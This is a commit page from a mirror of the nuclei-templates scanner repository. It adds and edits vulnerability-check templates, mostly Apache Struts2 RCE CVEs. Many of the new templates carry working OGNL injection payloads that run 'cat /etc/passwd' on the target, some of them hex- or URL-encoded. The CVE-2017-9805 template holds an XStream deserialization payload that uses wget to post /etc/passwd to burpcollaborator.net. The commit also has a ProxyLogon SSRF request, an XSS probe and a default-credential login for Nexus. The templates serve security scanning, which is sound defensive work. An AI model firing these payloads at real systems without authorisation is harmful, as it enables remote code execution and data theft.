daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #25 from projectdiscovery/master 

updation
patch-1
Dhiyaneshwaran 2021-03-07 19:15:49 +05:30 committed by GitHub
parent 7a57776609 0d75d24bd9
commit bbf5bf4b5a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
23 changed files with 400 additions and 46 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
README.md
View File

@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ |
| cves | 221 | vulnerabilities | 105 | exposed-panels | 95 |
| exposures | 60 | technologies | 50 | misconfiguration | 50 |
| workflows | 23 | miscellaneous | 16 | default-logins | 17 |
| cves | 229 | vulnerabilities | 105 | exposed-panels | 100 |
| exposures | 60 | technologies | 50 | misconfiguration | 51 |
| workflows | 23 | miscellaneous | 16 | default-logins | 18 |
| exposed-tokens | 9 | dns | 6 | fuzzing | 4 |
| helpers | 2 | takeovers | 1 | - | - |
**69 directories, 672 files**.
**72 directories, 687 files**.
</td>
</tr>

29
cves/2007/CVE-2007-4556.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2007-4556
info:
name: Apache Struts2 S2-001 RCE
author: pikpikcu
severity: critical
reference: https://www.guildhab.top/?p=2326
tags: cve,cve2007,apache,rce,struts
requests:
- method: POST
path:
- "{{BaseURL}}/login.action"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
part: body
- type: status
status:
- 200

24
cves/2012/CVE-2012-0392.yaml Normal file
View File

@ -0,0 +1,24 @@
id: CVE-2012-0392
info:
name: Apache Struts2 S2-008 RCE
author: pikpikcu
severity: critical
reference: https://blog.csdn.net/weixin_43416469/article/details/113850545
tags: cve, cve2012,apache,rce,struts
requests:
- method: GET
path:
- "{{BaseURL}}/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

28
cves/2013/CVE-2013-1965.yaml Normal file
View File

@ -0,0 +1,28 @@
id: CVE-2013-1965
info:
name: Apache Struts2 S2-012 RCE
author: pikpikcu
severity: critical
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-1965
tags: cve,cve2013,apache,rce,struts
requests:
- method: POST
path:
- "{{BaseURL}}/user.action"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

2
cves/2013/CVE-2013-2251.yaml
View File

@ -5,7 +5,7 @@ info:
author: exploitation & @dwisiswant0
severity: critical
description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
tags: cve,cve2013,rce
tags: cve,cve2013,rce,struts,apache
requests:
- payloads:

4
cves/2016/CVE-2016-3081.yaml
View File

@ -1,11 +1,11 @@
id: CVE-2016-3081
info:
name: S2-032 Struts RCE
name: Apache S2-032 Struts RCE
author: dhiyaneshDK
severity: high
reference: https://cwiki.apache.org/confluence/display/WW/S2-032
tags: cve,cve2016,struts,rce
tags: cve,cve2016,struts,rce,apache
requests:
- raw:

24
cves/2017/CVE-2017-12611.yaml Normal file
View File

@ -0,0 +1,24 @@
id: CVE-2017-12611
info:
name: Apache Struts2 S2-053 RCE
author: pikpikcu
severity: critical
reference: https://nvd.nist.gov/vuln/detail/CVE-2017-12611
tags: cve,cve2017,apache,rce,struts
requests:
- method: POST
path:
- "{{BaseURL}}/?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

6
cves/2017/CVE-2017-5638.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2017-5638
info:
author: "Random Robbie"
name: "Struts2 RCE "
author: Random Robbie
name: Apache Struts2 RCE
severity: critical
description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attackers invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
tags: cve,cve2017,struts,rce
tags: cve,cve2017,struts,rce,apache
# This template supports the detection part only.
# Do not test any website without permission

33
cves/2017/CVE-2017-9791.yaml Normal file
View File

@ -0,0 +1,33 @@
id: CVE-2017-9791
info:
name: Apache Struts2 S2-053 RCE
author: pikpikcu
severity: critical
reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9791
tags: cve, cve2017,apache,rce
requests:
- method: POST
path:
- "{{BaseURL}}/integration/saveGangster.action"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
name=%25%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%71%3d%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%27%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%2e%28%23%71%29%7d&age=10&__checkbox_bustedBefore=true&description=
matchers-condition: and
matchers:
- type: word
words:
- "Content-Type: text/html"
part: header
- type: regex
regex:
- "root:[x*]:0:0"
condition: and
- type: status
status:
- 200

87
cves/2017/CVE-2017-9805.yaml Normal file
View File

@ -0,0 +1,87 @@
id: CVE-2017-9805
info:
name: Apache Struts2 S2-052 RCE
author: pikpikcu
severity: critical
reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9805
tags: cve,cve2017,apache,rce,struts
requests:
- method: POST
path:
- "{{BaseURL}}/struts2-rest-showcase/orders/3"
- "{{BaseURL}}/orders/3"
headers:
Content-Type: application/xml
body: |
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
<string>wget</string>
<string>--post-file</string>
<string>/etc/passwd</string>
<string>burpcollaborator.net</string>
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>asdasd</name>
</filter>
<next class="string">asdasd</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer></ibuffer>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>
matchers-condition: and
matchers:
- type: word
words:
- "Debugging information"
- "com.thoughtworks.xstream.converters.collections.MapConverter"
condition: and
- type: status
status:
- 500

24
cves/2018/CVE-2018-11776.yaml Normal file
View File

@ -0,0 +1,24 @@
id: CVE-2018-11776
info:
name: Apache Struts2 S2-057 RCE
author: pikpikcu
severity: critical
reference: https://github.com/jas502n/St2-057
tags: cve,cve2018,apache,rce,struts2
requests:
- method: GET
path:
- "{{BaseURL}}/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

34
cves/2019/CVE-2019-0221.yaml Normal file
View File

@ -0,0 +1,34 @@
id: CVE-2019-0221
info:
name: Apache Tomcat XSS
author: pikpikcu
severity: low
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-0221
description: |
The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and
7.0.0 to 7.0.93 echoes user provided data without escaping and is,
therefore, vulnerable to XSS. SSI is disabled by default.
The printenv command is intended for debugging and is unlikely to be present in a production website.
tags: cve,cve2019,apache,xss
requests:
- method: GET
path:
- "{{BaseURL}}/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E"
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert('xss')</script>"
- type: word
words:
- "text/html"
part: header
- type: status
status:
- 200

4
cves/2020/CVE-2020-12116.yaml
View File

@ -6,9 +6,7 @@ info:
severity: high
description: Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a crafted request.
tags: cve,cve2020,zoho,traversal
# References:
# - https://github.com/BeetleChunks/CVE-2020-12116
reference: https://github.com/BeetleChunks/CVE-2020-12116
requests:
- raw:

27
cves/2020/CVE-2020-14815.yaml
View File

@ -1,27 +0,0 @@
id: CVE-2020-14815
info:
name: Oracle Business Intelligence XSS
author: pikpikcu
severity: medium
reference: https://www.oracle.com/security-alerts/cpuoct2020.html
tags: cve,cve2020,oracle,xss
source: https://twitter.com/HackerOn2Wheels/status/1326927875279380480
requests:
- method: GET
path:
- "{{BaseURL}}/bi-security-login/login.jsp?msi=false&redirect=%22%3E%3Cimg/src/onerror%3dalert(document.domain)%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "X-Oracle-Dms-Ecid:"
- "X-Oracle-Dms-Rid:"
- "Set-Cookie:"
part: header
condition: and

2
cves/2020/CVE-2020-17530.yaml
View File

@ -5,7 +5,7 @@ info:
author: pikpikcu
severity: critical
reference: http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html
tags: cve,cve2020,apache,rce
tags: cve,cve2020,apache,rce,struts
# Forced OGNL evaluation, when evaluated on raw user input in tag attributes,
# may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25.

34
cves/2021/CVE-2021-26855.yaml Normal file
View File

@ -0,0 +1,34 @@
id: CVE-2021-26855
info:
name: Exchange Server SSRF Vulnerability
author: madrobot
severity: critical
description: |
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.
tags: cve,cve2021,ssrf,rce,exchange
reference: |
- https://proxylogon.com/#timeline
- https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
- https://www.shodan.io/search?query=vuln%3ACVE-2021-26855
- https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09
requests:
- raw:
- |
GET /owa/auth/x.js HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Cookie: X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
Accept-Language: en
Connection: close
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Burp Collaborator Server"
part: body

2
cves/2021/CVE-2021-3378.yaml
View File

@ -24,7 +24,7 @@ requests:
------WebKitFormBoundarySHHbUsfCoxlX1bpS
Content-Disposition: form-data; name="file"; filename="poc.txt"
Content-Type: imnage/png
Content-Type: image/png
POC_TEST

31
default-logins/nexus/nexus-default-password.yaml Normal file
View File

@ -0,0 +1,31 @@
id: nexus-default-password
info:
name: Nexus Default Password
author: pikpikcu
severity: high
tags: nexus,dlogin
requests:
- raw:
- |
POST /service/rapture/session HTTP/1.1
Host: {{Hostname}}
Content-Length: 43
X-Nexus-UI: true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: close
username=YWRtaW4%3D&password=YWRtaW4xMjM%3D
matchers-condition: and
matchers:
- type: status
status:
- 204
- type: word
words:
- "Server: Nexus"
- "NXSESSIONID"
part: header
condition: and

3
exposures/configs/exposed-hg.yaml
View File

@ -10,6 +10,7 @@ requests:
path:
- "{{BaseURL}}/.hg/hgrc"
matchers-condition: and
matchers:
- type: word
words:
@ -19,4 +20,4 @@ requests:
- type: status
status:
- 200
- 200

15
exposures/configs/phpinfo.yaml
View File

@ -2,7 +2,7 @@ id: phpinfo-files
info:
name: phpinfo Disclosure
author: pd-team & daffainfo
author: pd-team & daffainfo & meme-lord
severity: low
requests:
@ -25,9 +25,22 @@ requests:
- "{{BaseURL}}/infos.php"
- "{{BaseURL}}/linusadmin-phpinfo.php"
- "{{BaseURL}}/php-info.php"
matchers-condition: and
matchers:
- type: word
words:
- "PHP Extension"
- "PHP Version"
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '>PHP Version <\/td><td class="v">([0-9.]+)'

2
exposures/logs/struts-debug-mode.yaml
View File

@ -4,7 +4,7 @@ info:
name: Apache Struts setup in Debug-Mode
author: pd-team
severity: low
tags: logs,struts
tags: logs,struts,apache
requests:
- method: GET

21
misconfiguration/gitlab-snippets.yaml Normal file
View File

@ -0,0 +1,21 @@
id: gitlab-snippets
info:
name: GitLab public snippets
author: pdteam
severity: info
reference: https://gist.github.com/vysecurity/20311c29d879e0aba9dcffbe72a88b10
requests:
- method: GET
path:
- "{{BaseURL}}/explore/snippets"
matchers-condition: and
matchers:
- type: word
words:
- '<title>Snippets · Explore · GitLab</title>'
- type: status
status:
- 200

2
technologies/microsoft-echange-server-detect.yaml
View File

@ -1,4 +1,4 @@
id: microsoft-echange-server-detect
id: microsoft-exchange-server-detect
info:
name: Microsoft Exchange Server Detect